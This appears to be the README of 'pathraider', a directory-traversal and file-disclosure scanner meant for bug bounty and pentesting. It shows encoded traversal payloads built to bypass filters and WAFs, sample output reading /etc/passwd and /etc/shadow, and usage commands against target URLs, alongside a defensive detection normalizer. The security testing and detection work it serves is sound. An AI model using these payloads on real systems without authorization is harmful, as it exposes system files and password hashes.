Offensive LFD and Directory Traversal scanner
Detects Local File Disclosure and Directory Traversal vulnerabilities with automatic encoding bypass (URL, double URL, Unicode, null byte). Built for bug bounty triage and web pentesting.
```
LFD & Directory Traversal scanner v1.1.0
encodings: plain · %2e · double · unicode · null
by theoffsecgirl
```
Checks whether a web application parameter allows reading local system files (LFD / Path Traversal). Automatically generates encoding variants to bypass filters and WAFs.
- Single target (`--url`) or multiple from file (`--list`)
- Injection via `FUZZ` marker or configurable parameter (`--param`)
- 132 test paths auto-generated from 12 base paths with encodings:
  - Plain, `%2e%2e%2f`, double encoding, `..%2f`, backslash, `..%5c`, unicode overlong, `%c0%ae`, null byte
- Heuristic detection of sensitive content (`/etc/passwd`, `win.ini`, etc.)
- Concurrent scanning with threads
- JSON export

pathraider automatically tries multiple encoding variants per payload:
| Technique | Example |
|---|---|
| Plain | ../../../etc/passwd |
| URL encoded | %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd |
| Double URL encoded | %252e%252e%252f |
| Unicode | ..%c0%af..%c0%af |
| Null byte | ../../../etc/passwd%00.jpg |
| Mixed | ....//....//etc/passwd |
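
The same variants seen from the detection side: a normalizer that undoes each encoding in the table before checking for a `..` path segment, so a log or WAF rule matches the canonical form rather than one spelling of it. This is an added example, not part of pathraider; the function name, the finding labels and the sample values are assumptions made for illustration.

```python
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 forms of '.', '/' and '\' that lenient decoders accept.
OVERLONG = {b"\xc0\xae": b".", b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}


def traversal_findings(value, max_rounds=3):
    """Return the evasion techniques seen in one raw parameter value.

    An empty set means no traversal sequence survived normalization.
    """
    seen = set()
    data = value.encode("utf-8")
    # Percent-decode repeatedly; a second productive round means double encoding.
    for depth in range(1, max_rounds + 1):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
        seen.add("url-encoded" if depth == 1 else "double-encoded")
    for raw, char in OVERLONG.items():
        if raw in data:
            data = data.replace(raw, char)
            seen.add("overlong-utf8")
    if b"\x00" in data:
        data = data.split(b"\x00", 1)[0]  # what a C string API would see
        seen.add("null-byte")
    path = data.decode("latin-1").replace("\\", "/")
    if ".." not in path.split("/"):
        # Model a filter that strips "../" once: "....//" collapses to "../".
        path = path.replace("../", "")
        if ".." not in path.split("/"):
            return set()
        seen.add("nested")
    return seen | {"traversal"}


# Constructed samples: rows of the table above plus two benign values.
SAMPLES = [
    "../../../etc/passwd",
    "%252e%252e%252f",
    "..%c0%af..%c0%af",
    "../../../etc/passwd%00.jpg",
    "....//....//etc/passwd",
    "report.pdf",
    "docs/v1..2/a%20b.txt",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:45} {sorted(traversal_findings(sample))}")
```

Matching on whole path segments rather than the substring `..` keeps names such as `v1..2` from being flagged.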

```
[*] Target: https://example.com/download?file=
[*] Payloads: 180 | Encodings: 6 variants each
[!] LFI found → https://example.com/download?file=../../../../etc/passwd
    Payload: ../../../../etc/passwd
    Encoding: plain
    Match: root:x:0:0
[!] LFI found → https://example.com/download?file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fshadow
    Payload: ../../../../etc/shadow
    Encoding: url-encoded
    Match: root:$6$
[+] Vulnerabilities found: 2
[+] Results saved → results.json
[*] Scan completed in 3.2s
```

- Parameter takes a filename or path (`?file=`, `?path=`, `?doc=`, `?template=`)
- File download endpoints
- PDF/image generators that fetch local files
- Any endpoint that reads from the filesystem

```bash
git clone https://github.com/theoffsecgirl/pathraider.git
cd pathraider
pip install -e .
pathraider --help
```

```bash
# Scan with FUZZ marker
pathraider -u "https://example.com/download.php?file=FUZZ"
# With parameter
pathraider -u "https://example.com/get.php" -p file
# List of targets
pathraider -L scope.txt -T 20
# Export JSON
pathraider -L scope.txt --json-output results.json
# Show version
pathraider --version
```

```
-u, --url        Target URL (can contain FUZZ)
-L, --list       File with list of targets
--paths          Custom traversal paths
-p, --param      Parameter without FUZZ (default: file)
-t, --timeout    Timeout per request (default: 5)
-T, --threads    Threads per target (default: 10)
-A, --agent      Custom User-Agent
--insecure       Disable TLS verification
--json-output    Save results to JSON
-v, --verbose    More output
--version        Show version
```

```bash
# Quick test on a specific parameter
pathraider -u 'https://target.com/download?file=test'
# With custom depth and timeout
pathraider -u 'https://target.com/file?path=test' -d 10 -t 15
# Export to JSON for report
pathraider -u 'https://target.com/doc?name=test' --json-output findings.json
# Scan a list of targets from file
pathraider -L urls.txt -T 20 --json-output findings.json
```

PRs welcome. Especially interested in:
- New encoding bypass variants
- False positive reduction
- New file targets (Windows paths, cloud metadata endpoints)
For bug bounty, labs and authorized audits only.
MIT · theoffsecgirl